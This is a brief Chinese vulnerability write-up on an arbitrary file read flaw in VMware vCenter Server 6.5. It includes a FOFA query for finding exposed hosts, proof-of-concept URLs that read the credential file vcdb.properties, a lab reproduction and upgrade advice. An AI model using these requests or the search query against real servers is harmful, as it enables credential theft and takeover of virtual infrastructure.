当前位置: 代码迷 >> 综合 >> VMware vCenter Server 任意文件读取漏洞
  详细解决方案

VMware vCenter Server 任意文件读取漏洞

热度:48   发布时间:2024-03-06 05:20:16.0

1.影响版本

VMware vCenter Server 6.5.0a至f版本(之前版本也可能受影响)

2.资产查找

FOFA:title="ID_VC_Welcome"

3.漏洞描述

        VMware vCenter存在任意文件读取漏洞,远程攻击者通过访问开放在外部的vCenter 控制台,可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理帐号密码)进而控制 vCenter 平台及其管理的虚拟机集群。

4.漏洞POC

1)https://主机地址/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

2)https://主机地址/eam/vib?id=C:/windows/win.ini

5.漏洞复现

1)在服务器部署vcenter-server,通过浏览器访问vCenter控制台

https://192.168.210.152/vsphere-client/?csp

2)访问漏洞POC

https://192.168.210.152/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

https://192.168.210.152/eam/vib?id=C:/windows/win.ini

6.修复建议

Vmware 确认该漏洞已在 6.5u1 版本中修复,请尽快升级至安全版本或更高版本。

  相关解决方案